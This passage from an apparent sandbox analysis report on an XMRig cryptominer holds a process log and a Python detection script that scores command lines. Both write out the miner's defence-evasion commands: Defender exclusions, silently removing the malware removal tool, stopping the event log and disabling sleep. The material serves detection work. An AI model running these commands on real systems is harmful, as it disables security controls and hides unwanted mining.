                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
                                                      Imagebase:0x7ff701160000
                                                      File size:2'729'064 bytes
                                                      MD5 hash:5DF14B213736E361758FEC790BD16721
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 58%, ReversingLabs
• Detection: 62%, Virustotal
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:13:10:02
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:13:10:02
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e40d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:36
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:conhost.exe
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F36EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:39
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6b1b50000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:44
                                                      Start time:13:10:43
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                      Imagebase:0x7ff7403e0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false
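
The command lines recorded for targets 17 to 39 above form one recognisable chain: remove the Malicious Software Removal Tool package (wusa /uninstall /kb:890830), register a randomly named auto-start service whose binary lives under C:\ProgramData, stop the EventLog service, add Defender exclusions for the user profile, ProgramData and every .exe, and zero the standby and hibernate timeouts so the miner is never suspended. What follows is an added detection example written for this report page; it is not code from Joe Sandbox, from the Sigma rules the report cites, or from the sample. It applies one regex rule per step to process command lines (the input is constructed here from the command lines above, plus one benign sc.exe call and one base64-encoded variant of the Add-MpPreference call built at import time, since the report's signature list also flags a base64-encoded MpPreference cmdlet), decodes -EncodedCommand payloads before matching, and scores the host. The rule weights, the alert threshold and the set of -EncodedCommand spellings are illustrative assumptions.

```python
import base64
import re
from dataclasses import dataclass, field

# Detection rules, one per step of the chain recorded in the report's process
# list. Each rule is (name, regex applied to the decoded command line, weight).
# Weights and the alert threshold are illustrative assumptions, not values
# taken from the report or from any published Sigma rule.
RULES = [
    ("wusa_uninstall_msrt",
     re.compile(r"\bwusa(\.exe)?\b.*/uninstall\b.*/kb:890830\b", re.I), 2),
    ("sc_create_service_in_programdata",
     re.compile(r'\bsc(\.exe)?\b\s+create\s.*binpath=\s*"?[a-z]:\\programdata\\', re.I), 3),
    ("sc_stop_eventlog",
     re.compile(r"\bsc(\.exe)?\b\s+stop\s+eventlog\b", re.I), 3),
    ("defender_exclusion_added",
     re.compile(r"\bAdd-MpPreference\b.*-Exclusion(Path|Extension|Process)\b", re.I), 3),
    ("powercfg_disable_sleep",
     re.compile(r"\bpowercfg(\.exe)?\b\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b", re.I), 1),
]
ALERT_THRESHOLD = 6

# Spellings of the -EncodedCommand switch handled here (assumption: the common
# abbreviations), followed by the base64 blob.
ENCODED_SWITCH = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Replace a -EncodedCommand base64 blob with its UTF-16LE plaintext.

    PowerShell encodes the script as UTF-16LE before base64; lines without the
    switch, or whose blob does not decode, are returned unchanged."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return cmdline
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[: m.start(1)] + script + cmdline[m.end(1):]


@dataclass
class Verdict:
    hits: list = field(default_factory=list)   # (rule name, original command line)
    score: int = 0

    @property
    def rules(self) -> set:
        return {name for name, _ in self.hits}

    @property
    def suspected(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def evaluate(cmdlines) -> Verdict:
    """Score a set of process command lines from one host or process tree.

    Each rule contributes its weight once, however many lines trigger it, so a
    single repeated command (four powercfg calls) cannot reach the threshold
    alone; it takes several distinct steps of the chain, as in the report."""
    verdict = Verdict()
    counted = set()
    for raw in cmdlines:
        line = decode_encoded_command(raw)
        for name, pattern, weight in RULES:
            if pattern.search(line):
                verdict.hits.append((name, raw))
                if name not in counted:
                    counted.add(name)
                    verdict.score += weight
    return verdict


# Constructed input: the command lines recorded for targets 17 to 39 of this
# report, one benign sc.exe call, and one base64-encoded variant of the
# Add-MpPreference call built here the way PowerShell's -EncodedCommand expects.
ENCODED_SAMPLE = "powershell.exe -enc " + base64.b64encode(
    r"Add-MpPreference -ExclusionPath C:\ProgramData -Force".encode("utf-16le")
).decode("ascii")

SAMPLE_COMMAND_LINES = [
    r"wusa /uninstall /kb:890830 /quiet /norestart",
    r'C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"',
    r"C:\Windows\system32\sc.exe stop eventlog",
    r'C:\Windows\system32\sc.exe start "VKWMZEFB"',
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0",
    r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0",
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0",
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0",
    r"C:\Windows\system32\sc.exe query wuauserv",   # benign control line
    ENCODED_SAMPLE,
]

if __name__ == "__main__":
    v = evaluate(SAMPLE_COMMAND_LINES)
    for name, line in v.hits:
        print(f"{name:36s} {line}")
    print(f"score={v.score} threshold={ALERT_THRESHOLD} suspected={v.suspected}")
```

Run against the lines above, every rule fires and the score reaches 12, while the benign sc.exe query contributes nothing. The once-per-rule scoring is the point of the design: a host that only trips the powercfg rule stays under the threshold, and the chain is only called out when the service creation, the Defender exclusion and the EventLog stop appear together, which is also the combination that distinguishes this sample from an administrator's scripted power-plan change. On a real endpoint the lines would come from Sysmon event 1 or Security event 4688 with command-line auditing enabled; both record the plain command line the rules expect, and the decoder covers the encoded-PowerShell variant the report's signature list refers to.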


                                                        Execution Graph

                                                        Execution Coverage:3.6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:13.8%
                                                        Total number of Nodes:1347
                                                        Total number of Limit Nodes:2
execution_graph: the rendered node and edge listing is omitted here. The listed nodes are code addresses in the 0x7ff71eb1xxxx range; the API calls recorded on them are EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, Sleep, SetUnhandledExceptionFilter, _initterm, _amsg_exit, _cexit, malloc, memcpy, memset, strlen, VirtualQuery, VirtualProtect, and the wide-string routines wcslen, wcscpy, wcscat, _wcsicmp and _wcsnicmp.
7ff71eb11394 2 API calls 2771->2772 2773 7ff71eb115c6 2772->2773 2774 7ff71eb11394 2 API calls 2773->2774 2775 7ff71eb115d5 2774->2775 2776 7ff71eb115e4 2775->2776 2777 7ff71eb11394 2 API calls 2775->2777 2778 7ff71eb11394 2 API calls 2776->2778 2777->2776 2779 7ff71eb115f3 2778->2779 2779->2523 2780 7ff71eb1145e 2779->2780 2781 7ff71eb11394 2 API calls 2780->2781 2782 7ff71eb1146d 2781->2782 2783 7ff71eb11394 2 API calls 2782->2783 2784 7ff71eb1147c 2783->2784 2785 7ff71eb11394 2 API calls 2784->2785 2786 7ff71eb1148b 2785->2786 2787 7ff71eb11394 2 API calls 2786->2787 2788 7ff71eb1149a 2787->2788 2789 7ff71eb11394 2 API calls 2788->2789 2790 7ff71eb114a9 2789->2790 2791 7ff71eb11394 2 API calls 2790->2791 2792 7ff71eb114b8 2791->2792 2793 7ff71eb11394 2 API calls 2792->2793 2794 7ff71eb114c7 2793->2794 2795 7ff71eb11394 2 API calls 2794->2795 2796 7ff71eb114d6 2795->2796 2797 7ff71eb114e5 2796->2797 2798 7ff71eb11394 2 API calls 2796->2798 2799 7ff71eb11394 2 API calls 2797->2799 2798->2797 2800 7ff71eb114ef 2799->2800 2801 7ff71eb114f4 2800->2801 2802 7ff71eb11394 2 API calls 2800->2802 2803 7ff71eb11394 2 API calls 2801->2803 2802->2801 2804 7ff71eb114fe 2803->2804 2805 7ff71eb11503 2804->2805 2806 7ff71eb11394 2 API calls 2804->2806 2807 7ff71eb11394 2 API calls 2805->2807 2806->2805 2808 7ff71eb1150d 2807->2808 2809 7ff71eb11394 2 API calls 2808->2809 2810 7ff71eb11512 2809->2810 2811 7ff71eb11394 2 API calls 2810->2811 2812 7ff71eb11521 2811->2812 2813 7ff71eb11394 2 API calls 2812->2813 2814 7ff71eb11530 2813->2814 2815 7ff71eb11394 2 API calls 2814->2815 2816 7ff71eb1153f 2815->2816 2817 7ff71eb11394 2 API calls 2816->2817 2818 7ff71eb1154e 2817->2818 2819 7ff71eb11394 2 API calls 2818->2819 2820 7ff71eb1155d 2819->2820 2821 7ff71eb11394 2 API calls 2820->2821 2822 7ff71eb1156c 2821->2822 2823 7ff71eb11394 2 API calls 2822->2823 2824 7ff71eb1157b 2823->2824 2825 7ff71eb11394 2 API calls 2824->2825 2826 7ff71eb1158a 2825->2826 2827 7ff71eb11394 2 API calls 
2826->2827 2828 7ff71eb11599 2827->2828 2829 7ff71eb11394 2 API calls 2828->2829 2830 7ff71eb115a8 2829->2830 2831 7ff71eb11394 2 API calls 2830->2831 2832 7ff71eb115b7 2831->2832 2833 7ff71eb11394 2 API calls 2832->2833 2834 7ff71eb115c6 2833->2834 2835 7ff71eb11394 2 API calls 2834->2835 2836 7ff71eb115d5 2835->2836 2837 7ff71eb115e4 2836->2837 2838 7ff71eb11394 2 API calls 2836->2838 2839 7ff71eb11394 2 API calls 2837->2839 2838->2837 2840 7ff71eb115f3 2839->2840 2840->2523 3274 7ff71eb12660 2841->3274 2846 7ff71eb1145e 2 API calls 2847 7ff71eb12f35 2846->2847 2848 7ff71eb12f53 2847->2848 3309 7ff71eb11512 2847->3309 2851 7ff71eb1145e 2 API calls 2848->2851 2849 7ff71eb12e3c 3276 7ff71eb12690 2849->3276 2852 7ff71eb12f5d 2851->2852 2852->2544 2854 7ff71eb11394 2 API calls 2853->2854 2855 7ff71eb1147c 2854->2855 2856 7ff71eb11394 2 API calls 2855->2856 2857 7ff71eb1148b 2856->2857 2858 7ff71eb11394 2 API calls 2857->2858 2859 7ff71eb1149a 2858->2859 2860 7ff71eb11394 2 API calls 2859->2860 2861 7ff71eb114a9 2860->2861 2862 7ff71eb11394 2 API calls 2861->2862 2863 7ff71eb114b8 2862->2863 2864 7ff71eb11394 2 API calls 2863->2864 2865 7ff71eb114c7 2864->2865 2866 7ff71eb11394 2 API calls 2865->2866 2867 7ff71eb114d6 2866->2867 2868 7ff71eb114e5 2867->2868 2869 7ff71eb11394 2 API calls 2867->2869 2870 7ff71eb11394 2 API calls 2868->2870 2869->2868 2871 7ff71eb114ef 2870->2871 2872 7ff71eb114f4 2871->2872 2873 7ff71eb11394 2 API calls 2871->2873 2874 7ff71eb11394 2 API calls 2872->2874 2873->2872 2875 7ff71eb114fe 2874->2875 2876 7ff71eb11503 2875->2876 2877 7ff71eb11394 2 API calls 2875->2877 2878 7ff71eb11394 2 API calls 2876->2878 2877->2876 2879 7ff71eb1150d 2878->2879 2880 7ff71eb11394 2 API calls 2879->2880 2881 7ff71eb11512 2880->2881 2882 7ff71eb11394 2 API calls 2881->2882 2883 7ff71eb11521 2882->2883 2884 7ff71eb11394 2 API calls 2883->2884 2885 7ff71eb11530 2884->2885 2886 7ff71eb11394 2 API calls 2885->2886 2887 7ff71eb1153f 2886->2887 2888 7ff71eb11394 2 
API calls 2887->2888 2889 7ff71eb1154e 2888->2889 2890 7ff71eb11394 2 API calls 2889->2890 2891 7ff71eb1155d 2890->2891 2892 7ff71eb11394 2 API calls 2891->2892 2893 7ff71eb1156c 2892->2893 2894 7ff71eb11394 2 API calls 2893->2894 2895 7ff71eb1157b 2894->2895 2896 7ff71eb11394 2 API calls 2895->2896 2897 7ff71eb1158a 2896->2897 2898 7ff71eb11394 2 API calls 2897->2898 2899 7ff71eb11599 2898->2899 2900 7ff71eb11394 2 API calls 2899->2900 2901 7ff71eb115a8 2900->2901 2902 7ff71eb11394 2 API calls 2901->2902 2903 7ff71eb115b7 2902->2903 2904 7ff71eb11394 2 API calls 2903->2904 2905 7ff71eb115c6 2904->2905 2906 7ff71eb11394 2 API calls 2905->2906 2907 7ff71eb115d5 2906->2907 2908 7ff71eb115e4 2907->2908 2909 7ff71eb11394 2 API calls 2907->2909 2910 7ff71eb11394 2 API calls 2908->2910 2909->2908 2911 7ff71eb115f3 2910->2911 2911->2566 2912 7ff71eb11404 2911->2912 2913 7ff71eb11394 2 API calls 2912->2913 2914 7ff71eb11413 2913->2914 2915 7ff71eb11394 2 API calls 2914->2915 2916 7ff71eb11422 2915->2916 2917 7ff71eb11394 2 API calls 2916->2917 2918 7ff71eb11431 2917->2918 2919 7ff71eb11394 2 API calls 2918->2919 2920 7ff71eb11440 2919->2920 2921 7ff71eb11394 2 API calls 2920->2921 2922 7ff71eb1144f 2921->2922 2923 7ff71eb11394 2 API calls 2922->2923 2924 7ff71eb1145e 2923->2924 2925 7ff71eb11394 2 API calls 2924->2925 2926 7ff71eb1146d 2925->2926 2927 7ff71eb11394 2 API calls 2926->2927 2928 7ff71eb1147c 2927->2928 2929 7ff71eb11394 2 API calls 2928->2929 2930 7ff71eb1148b 2929->2930 2931 7ff71eb11394 2 API calls 2930->2931 2932 7ff71eb1149a 2931->2932 2933 7ff71eb11394 2 API calls 2932->2933 2934 7ff71eb114a9 2933->2934 2935 7ff71eb11394 2 API calls 2934->2935 2936 7ff71eb114b8 2935->2936 2937 7ff71eb11394 2 API calls 2936->2937 2938 7ff71eb114c7 2937->2938 2939 7ff71eb11394 2 API calls 2938->2939 2940 7ff71eb114d6 2939->2940 2941 7ff71eb114e5 2940->2941 2942 7ff71eb11394 2 API calls 2940->2942 2943 7ff71eb11394 2 API calls 2941->2943 2942->2941 2944 7ff71eb114ef 
2943->2944 2945 7ff71eb114f4 2944->2945 2946 7ff71eb11394 2 API calls 2944->2946 2947 7ff71eb11394 2 API calls 2945->2947 2946->2945 2948 7ff71eb114fe 2947->2948 2949 7ff71eb11503 2948->2949 2950 7ff71eb11394 2 API calls 2948->2950 2951 7ff71eb11394 2 API calls 2949->2951 2950->2949 2952 7ff71eb1150d 2951->2952 2953 7ff71eb11394 2 API calls 2952->2953 2954 7ff71eb11512 2953->2954 2955 7ff71eb11394 2 API calls 2954->2955 2956 7ff71eb11521 2955->2956 2957 7ff71eb11394 2 API calls 2956->2957 2958 7ff71eb11530 2957->2958 2959 7ff71eb11394 2 API calls 2958->2959 2960 7ff71eb1153f 2959->2960 2961 7ff71eb11394 2 API calls 2960->2961 2962 7ff71eb1154e 2961->2962 2963 7ff71eb11394 2 API calls 2962->2963 2964 7ff71eb1155d 2963->2964 2965 7ff71eb11394 2 API calls 2964->2965 2966 7ff71eb1156c 2965->2966 2967 7ff71eb11394 2 API calls 2966->2967 2968 7ff71eb1157b 2967->2968 2969 7ff71eb11394 2 API calls 2968->2969 2970 7ff71eb1158a 2969->2970 2971 7ff71eb11394 2 API calls 2970->2971 2972 7ff71eb11599 2971->2972 2973 7ff71eb11394 2 API calls 2972->2973 2974 7ff71eb115a8 2973->2974 2975 7ff71eb11394 2 API calls 2974->2975 2976 7ff71eb115b7 2975->2976 2977 7ff71eb11394 2 API calls 2976->2977 2978 7ff71eb115c6 2977->2978 2979 7ff71eb11394 2 API calls 2978->2979 2980 7ff71eb115d5 2979->2980 2981 7ff71eb115e4 2980->2981 2982 7ff71eb11394 2 API calls 2980->2982 2983 7ff71eb11394 2 API calls 2981->2983 2982->2981 2984 7ff71eb115f3 2983->2984 2984->2570 2986 7ff71eb11394 2 API calls 2985->2986 2987 7ff71eb1158a 2986->2987 2988 7ff71eb11394 2 API calls 2987->2988 2989 7ff71eb11599 2988->2989 2990 7ff71eb11394 2 API calls 2989->2990 2991 7ff71eb115a8 2990->2991 2992 7ff71eb11394 2 API calls 2991->2992 2993 7ff71eb115b7 2992->2993 2994 7ff71eb11394 2 API calls 2993->2994 2995 7ff71eb115c6 2994->2995 2996 7ff71eb11394 2 API calls 2995->2996 2997 7ff71eb115d5 2996->2997 2998 7ff71eb115e4 2997->2998 2999 7ff71eb11394 2 API calls 2997->2999 3000 7ff71eb11394 2 API calls 2998->3000 2999->2998 
3001 7ff71eb115f3 3000->3001 3001->2579 3002 7ff71eb1158a 3001->3002 3003 7ff71eb11394 2 API calls 3002->3003 3004 7ff71eb11599 3003->3004 3005 7ff71eb11394 2 API calls 3004->3005 3006 7ff71eb115a8 3005->3006 3007 7ff71eb11394 2 API calls 3006->3007 3008 7ff71eb115b7 3007->3008 3009 7ff71eb11394 2 API calls 3008->3009 3010 7ff71eb115c6 3009->3010 3011 7ff71eb11394 2 API calls 3010->3011 3012 7ff71eb115d5 3011->3012 3013 7ff71eb115e4 3012->3013 3014 7ff71eb11394 2 API calls 3012->3014 3015 7ff71eb11394 2 API calls 3013->3015 3014->3013 3016 7ff71eb115f3 3015->3016 3016->2579 3018 7ff71eb11394 2 API calls 3017->3018 3019 7ff71eb115f3 3018->3019 3019->2582 3021 7ff71eb11394 2 API calls 3020->3021 3022 7ff71eb115b7 3021->3022 3023 7ff71eb11394 2 API calls 3022->3023 3024 7ff71eb115c6 3023->3024 3025 7ff71eb11394 2 API calls 3024->3025 3026 7ff71eb115d5 3025->3026 3027 7ff71eb115e4 3026->3027 3028 7ff71eb11394 2 API calls 3026->3028 3029 7ff71eb11394 2 API calls 3027->3029 3028->3027 3030 7ff71eb115f3 3029->3030 3030->2601 3030->2602 3032 7ff71eb11394 2 API calls 3031->3032 3033 7ff71eb1153f 3032->3033 3034 7ff71eb11394 2 API calls 3033->3034 3035 7ff71eb1154e 3034->3035 3036 7ff71eb11394 2 API calls 3035->3036 3037 7ff71eb1155d 3036->3037 3038 7ff71eb11394 2 API calls 3037->3038 3039 7ff71eb1156c 3038->3039 3040 7ff71eb11394 2 API calls 3039->3040 3041 7ff71eb1157b 3040->3041 3042 7ff71eb11394 2 API calls 3041->3042 3043 7ff71eb1158a 3042->3043 3044 7ff71eb11394 2 API calls 3043->3044 3045 7ff71eb11599 3044->3045 3046 7ff71eb11394 2 API calls 3045->3046 3047 7ff71eb115a8 3046->3047 3048 7ff71eb11394 2 API calls 3047->3048 3049 7ff71eb115b7 3048->3049 3050 7ff71eb11394 2 API calls 3049->3050 3051 7ff71eb115c6 3050->3051 3052 7ff71eb11394 2 API calls 3051->3052 3053 7ff71eb115d5 3052->3053 3054 7ff71eb115e4 3053->3054 3055 7ff71eb11394 2 API calls 3053->3055 3056 7ff71eb11394 2 API calls 3054->3056 3055->3054 3057 7ff71eb115f3 3056->3057 3057->2625 3057->2626 3059 
